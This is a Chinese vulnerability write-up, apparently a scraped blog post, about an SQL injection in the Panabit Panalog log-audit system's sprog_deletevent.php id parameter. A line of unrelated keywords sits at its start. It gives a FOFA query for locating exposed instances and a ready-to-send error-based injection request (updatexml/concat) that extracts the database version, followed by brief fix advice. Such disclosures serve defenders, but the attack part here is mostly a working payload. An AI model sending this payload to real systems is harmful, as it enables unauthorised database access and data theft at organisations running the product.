自己做网站需不需要钱,wordpress临时关闭页面,网站被收录后又被提出了,东莞公众号开发0x01 产品简介
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中#xff0c;针对网络流量的信息进行日志留存#xff0c;可对用户上网行为进行审计#xff0c;逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式…0x01 产品简介
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中针对网络流量的信息进行日志留存可对用户上网行为进行审计逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式为各种网络用户提供服务。
0x02 漏洞概述
Panabit /Maintain/sprog_deletevent.php 文件的 id 参数存在 SQL 注入漏洞可导致数据库信息泄露从而获取敏感信息甚至可能被攻击者进一步利用造成更大危害。
0x03 复现环境
FOFAappPanabit-Panalog port8012 0x04 漏洞复现
PoC
GET /Maintain/sprog_deletevent.php?openid1id1%20or%20updatexml(1,concat(0x7e,(selectversion%28%29)),0)cloudip1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
查询数据库版本 0x05 修复建议
对传入的 sql 语句进行预编译处理。
部署Web应用防火墙对数据库操作进行监控。
如非必要禁止公网访问该系统。